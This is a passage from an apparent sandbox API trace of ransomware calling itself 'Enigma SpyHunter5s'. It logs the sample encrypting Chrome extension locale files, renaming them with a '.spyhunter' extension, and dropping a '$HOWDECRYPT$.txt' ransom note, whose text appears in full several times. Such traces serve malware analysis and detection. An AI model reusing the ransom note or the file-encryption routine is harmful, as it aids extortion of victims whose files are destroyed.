Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.spyhunter")) returned 1 [0157.258] GetProcessHeap () returned 0x2c0000 [0157.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.258] GetProcessHeap () returned 0x2c0000 [0157.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.258] GetProcessHeap () returned 0x2c0000 [0157.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4a10 | out: hHeap=0x2c0000) returned 1 [0157.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.259] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.259] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x57ea73*, lpNumberOfBytesWritten=0x57eb9c*=0x127, lpOverlapped=0x0) returned 1 [0157.260] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.260] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb9c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.260] CloseHandle (hObject=0x9c) returned 1 [0157.260] GetProcessHeap () returned 0x2c0000 [0157.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4218 | out: hHeap=0x2c0000) returned 1 [0157.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb38 | out: pbBuffer=0x57eb38) returned 1 [0157.261] GetProcessHeap () returned 0x2c0000 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb30*=0x30) returned 1 [0157.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0157.262] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.262] GetProcessHeap () returned 0x2c0000 [0157.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.262] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eaf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.346] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.346] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eaf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.346] GetProcessHeap () returned 0x2c0000 [0157.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.346] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.346] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eaf4, lpOverlapped=0x0 | out: lpBuffer=0x57eb34*, lpNumberOfBytesWritten=0x57eaf4*=0x4, lpOverlapped=0x0) returned 1 [0157.346] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eaf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eaf4*=0x30, lpOverlapped=0x0) returned 1 [0157.346] CloseHandle (hObject=0x9c) returned 1 [0157.346] GetProcessHeap () returned 0x2c0000 [0157.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.347] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.spyhunter") returned 174 [0157.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.spyhunter")) returned 1 [0157.348] GetProcessHeap () returned 0x2c0000 [0157.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.348] GetProcessHeap () returned 0x2c0000 [0157.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.348] GetProcessHeap () returned 0x2c0000 [0157.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4080 | out: hHeap=0x2c0000) returned 1 [0157.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.349] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.349] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea6b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb94, lpOverlapped=0x0 | out: lpBuffer=0x57ea6b*, lpNumberOfBytesWritten=0x57eb94*=0x127, lpOverlapped=0x0) returned 1 [0157.350] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.350] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb94*=0x2ac, lpOverlapped=0x0) returned 1 [0157.350] CloseHandle (hObject=0x9c) returned 1 [0157.350] GetProcessHeap () returned 0x2c0000 [0157.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3005ab0 | out: hHeap=0x2c0000) returned 1 [0157.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb30 | out: pbBuffer=0x57eb30) returned 1 [0157.350] GetProcessHeap () returned 0x2c0000 [0157.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.350] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb28*=0x30) returned 1 [0157.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json") returned 164 [0157.351] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.351] GetProcessHeap () returned 0x2c0000 [0157.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.352] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eaec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eaec*=0x2800, lpOverlapped=0x0) returned 1 [0157.368] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.368] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eaec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eaec*=0x2800, lpOverlapped=0x0) returned 1 [0157.368] GetProcessHeap () returned 0x2c0000 [0157.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.368] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.368] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eaec, lpOverlapped=0x0 | out: lpBuffer=0x57eb2c*, lpNumberOfBytesWritten=0x57eaec*=0x4, lpOverlapped=0x0) returned 1 [0157.368] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eaec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eaec*=0x30, lpOverlapped=0x0) returned 1 [0157.368] CloseHandle (hObject=0x9c) returned 1 [0157.368] GetProcessHeap () returned 0x2c0000 [0157.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.368] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.spyhunter") returned 174 [0157.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0157.370] GetProcessHeap () returned 0x2c0000 [0157.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.370] GetProcessHeap () returned 0x2c0000 [0157.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.370] GetProcessHeap () returned 0x2c0000 [0157.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25b10 | out: hHeap=0x2c0000) returned 1 [0157.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.371] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.371] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x57ea63*, lpNumberOfBytesWritten=0x57eb8c*=0x127, lpOverlapped=0x0) returned 1 [0157.372] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.372] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb8c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.372] CloseHandle (hObject=0x9c) returned 1 [0157.372] GetProcessHeap () returned 0x2c0000 [0157.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cefeb0 | out: hHeap=0x2c0000) returned 1 [0157.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb28 | out: pbBuffer=0x57eb28) returned 1 [0157.372] GetProcessHeap () returned 0x2c0000 [0157.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.373] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb20*=0x30) returned 1 [0157.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0157.373] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.373] GetProcessHeap () returned 0x2c0000 [0157.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.373] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eae4*=0x2800, lpOverlapped=0x0) returned 1 [0157.469] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.469] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eae4*=0x2800, lpOverlapped=0x0) returned 1 [0157.470] GetProcessHeap () returned 0x2c0000 [0157.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.470] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.470] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eae4, lpOverlapped=0x0 | out: lpBuffer=0x57eb24*, lpNumberOfBytesWritten=0x57eae4*=0x4, lpOverlapped=0x0) returned 1 [0157.723] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eae4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eae4*=0x30, lpOverlapped=0x0) returned 1 [0157.723] CloseHandle (hObject=0x9c) returned 1 [0157.723] GetProcessHeap () returned 0x2c0000 [0157.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.723] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.spyhunter") returned 175 [0157.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0157.724] GetProcessHeap () returned 0x2c0000 [0157.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.724] GetProcessHeap () returned 0x2c0000 [0157.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.724] GetProcessHeap () returned 0x2c0000 [0157.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25318 | out: hHeap=0x2c0000) returned 1 [0157.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.725] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.725] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x57ea5b*, 